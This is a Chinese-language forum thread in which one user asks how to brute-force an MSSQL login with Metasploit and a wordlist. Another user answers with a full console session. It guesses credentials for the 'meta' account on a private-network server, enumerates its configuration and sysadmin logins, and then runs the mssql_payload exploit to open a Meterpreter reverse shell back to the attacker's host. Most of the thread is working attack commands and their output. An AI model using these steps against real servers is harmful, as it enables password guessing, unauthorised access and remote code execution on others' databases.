求助一个metasploit的问题

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login msf auxiliary(mssql_login) > info Name: MSSQL Login Utility Version: 7185 License: Metasploit Framework License (BSD) Provided by: MC <mc@metasploit.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- HEX2BINARY /home/Security/Metasploit/framework4/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk MSSQL_PASS no The password for the specified username MSSQL_PASS_FILE no A dictionary of passwords to perform a bruteforce attempt MSSQL_USER sa no The username to authenticate as RHOSTS yes The target address range or CIDR identifier RPORT 1433 yes The target port THREADS 1 yes The number of concurrent threads Description: This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank). msf auxiliary(mssql_login) > set MSSQL_USER meta MSSQL_USER => meta msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/password.txt MSSQL_PASS_FILE => /tmp/password.txt msf auxiliary(mssql_login) > set RHOSTS 10.6.21.200 RHOSTS => 10.6.21.200 msf auxiliary(mssql_login) > run [*] 10.6.21.200 successful logged in as 'meta' with password 'meta' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mssql_login) >set MSSQL_USER meta MSSQL_USER => meta msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/password.txt MSSQL_PASS_FILE => /tmp/password.txt msf auxiliary(mssql_login) > set RHOSTS 10.6.21.200 RHOSTS => 10.6.21.200 msf auxiliary(mssql_login) > run [*] 10.6.21.200:1433 successful logged in as 'meta' with password 'meta' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mssql_login) >use auxiliary/admin/mssql/mssql_enum msf auxiliary(mssql_enum) > info Name: Microsoft SQL Server Configuration Enumerator Version: 7226 License: Metasploit Framework License (BSD) Provided by: Security/Metasploit Perez <Security/Metasploit_perez@darkoperator.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- HEX2BINARY /home/Security/Metasploit/framework4/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk MSSQL_PASS no The password for the specified username MSSQL_USER sa no The username to authenticate as RHOST yes The target address RPORT 1433 yes The target port Description: This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied. msf auxiliary(mssql_enum) >msf auxiliary(mssql_enum) > set MSSQL_USER meta MSSQL_USER => meta msf auxiliary(mssql_enum) > set MSSQL_PASS meta MSSQL_USER => meta msf auxiliary(mssql_enum) > set RHOST 10.6.21.200 RHOST => 10.6.21.200 msf auxiliary(mssql_enum) > run [*] Running MS SQL Server Enumeration... [*] Auxiliary module execution completed msf auxiliary(mssql_enum) > set MSSQL_PASS meta MSSQL_PASS => meta msf auxiliary(mssql_enum) > run [*] Running MS SQL Server Enumeration... [*] Version: [*] Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) [*] Jun 22 2012 12:43:34 [*] Copyright (c) 1988-2012 Microsoft Corporation [*] Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2) [*] Configuration Parameters: [*] C2 Audit Mode is Not Enabled [*] xp_cmdshell is Enabled [*] remote access is Enabled [*] allow updates is Not Enabled [*] Database Mail XPs is Not Enabled [*] Ole Automation Procedures are Not Enabled [*] Databases on the server: [*] Database name:master [*] Databse Files for master: [*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\master.mdf [*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\mastlog.ldf [*] Database name:tempdb [*] Databse Files for tempdb: [*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\tempdb.mdf [*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\templog.ldf [*] Database name:model [*] Databse Files for model: [*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\model.mdf [*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\modellog.ldf [*] Database name:msdb [*] Databse Files for msdb: [*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf [*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf [*] System Logins on this Server: [*] sa [*] ##MS_SQLResourceSigningCertificate## [*] ##MS_SQLReplicationSigningCertificate## [*] ##MS_SQLAuthenticatorCertificate## [*] ##MS_PolicySigningCertificate## [*] ##MS_PolicyEventProcessingLogin## [*] ##MS_PolicyTsqlExecutionLogin## [*] ##MS_AgentSigningCertificate## [*] NT AUTHORITY\SYSTEM [*] NT AUTHORITY\NETWORK SERVICE [*] DBSQL2K801\Administrator [*] dangerlogin [*] meta [*] Disabled Accounts: [*] sa [*] ##MS_PolicyEventProcessingLogin## [*] ##MS_PolicyTsqlExecutionLogin## [*] No Accounts Policy is set for: [*] dangerlogin [*] meta [*] Password Expiration is not checked for: [*] sa [*] ##MS_PolicyEventProcessingLogin## [*] ##MS_PolicyTsqlExecutionLogin## [*] dangerlogin [*] meta [*] System Admin Logins on this Server: [*] sa [*] NT AUTHORITY\SYSTEM [*] NT AUTHORITY\NETWORK SERVICE [*] DBSQL2K801\Administrator [*] meta [*] Windows Logins on this Server: [*] NT AUTHORITY\SYSTEM [*] NT AUTHORITY\NETWORK SERVICE [*] DBSQL2K801\Administrator [*] Windows Groups that can logins on this Server: [*] No Windows Groups where found with permission to login to system. [*] Accounts with Username and Password being the same: [*] meta [*] Accounts with empty password: [*] No Accounts with empty passwords where found. [*] Stored Procedures with Public Execute Permission found: [*] sp_replsetsyncstatus [*] sp_replcounters [*] sp_replsendtoqueue [*] sp_resyncexecutesql [*] sp_prepexecrpc [*] sp_repltrans [*] sp_xml_preparedocument [*] xp_qv [*] xp_getnetname [*] sp_releaseschemalock [*] sp_refreshview [*] sp_replcmds [*] sp_unprepare [*] sp_resyncprepare [*] sp_createorphan [*] xp_dirtree [*] sp_replwritetovarbin [*] sp_replsetoriginator [*] sp_xml_removedocument [*] sp_repldone [*] sp_reset_connection [*] xp_fileexist [*] xp_fixeddrives [*] sp_getschemalock [*] sp_prepexec [*] xp_revokelogin [*] sp_resyncuniquetable [*] sp_replflush [*] sp_resyncexecute [*] xp_grantlogin [*] sp_droporphans [*] xp_regread [*] sp_getbindtoken [*] sp_replincrementlsn [*] Instances found on this server: [*] MSSQLSERVER [*] TESTINST [*] Default Server Instance SQL Server Service is running under the privilege of: [*] NT AUTHORITY\NETWORK SERVICE [*] Instance TESTINST SQL Server Service is running under the privilage of: [*] LocalSystem [*] Auxiliary module execution completed msf auxiliary(mssql_enum) > msf exploit(mssql_payload) > info Name: Microsoft SQL Server Payload Execution Version: 7236 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Provided by: David Kennedy "ReL1K" <kennedyd013@gmail.com> Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- HEX2BINARY /home/Security/Metasploit/framework4/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk MSSQL_PASS no The password for the specified username MSSQL_USER sa no The username to authenticate as RHOST yes The target address RPORT 1433 yes The target port Payload information: Description: This module will execute an arbitrary payload on a Microsoft SQL Server, using the Windows debug.com method for writing an executable to disk and the xp_cmdshell stored procedure. File size restrictions are avoided by incorporating the debug bypass method presented at Defcon 17 by SecureState. Note that this module will leave a metasploit payload in the Windows System32 directory which must be manually deleted once the attack is completed. References: http://www.osvdb.org/557 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402 http://www.securityfocus.com/bid/1281 http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf msf exploit(mssql_payload) > msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(mssql_payload) > set LHOST 10.6.21.102 LHOST => 10.6.21.102 msf exploit(mssql_payload) > set RHOST 10.6.21.200 RHOST => 10.6.21.200 msf exploit(mssql_payload) > set MSSQL_USER meta MSSQL_USER => meta msf exploit(mssql_payload) > set MSSQL_PASS meta MSSQL_PASS => meta msf exploit(mssql_payload) > exploit msf exploit(mssql_payload) > exploit [*] Started reverse handler on port 4444 [*] Warning: This module will leave fGDpiveA.exe in the SQL Server %TEMP% directory [*] Writing the debug.com loader to the disk... [*] Converting the debug script to an executable... [*] Uploading the payload, please be patient... [*] Converting the encoded payload... [*] Executing the payload... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (10.6.21.102:4444 -> 10.6.21.200:1708) meterpreter > sysinfo Computer: DBSQL2K801 OS : Windows .NET Server (Build 3790, Service Pack 2). Arch : x86 Language: en_US meterpreter > 【 在 huangzz 的大作中提到: 】 : 刚刚想用mssql_login爆破mssql的登录密码，但是竟然发现没有字典 : 在网上下的wordlist.txt不知道怎么用，有高手指点一下吗

【 在 Xsetc 的大作中提到: 】 : [code=bash] : msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login : msf auxiliary(mssql_login) > info : ................... 我把password.txt下下来之后设置路径之后run，老是提示密码字典不可用（原话忘了大概意思就是这样） 你的password.txt哪儿下的啊 我实在新浪资料上下的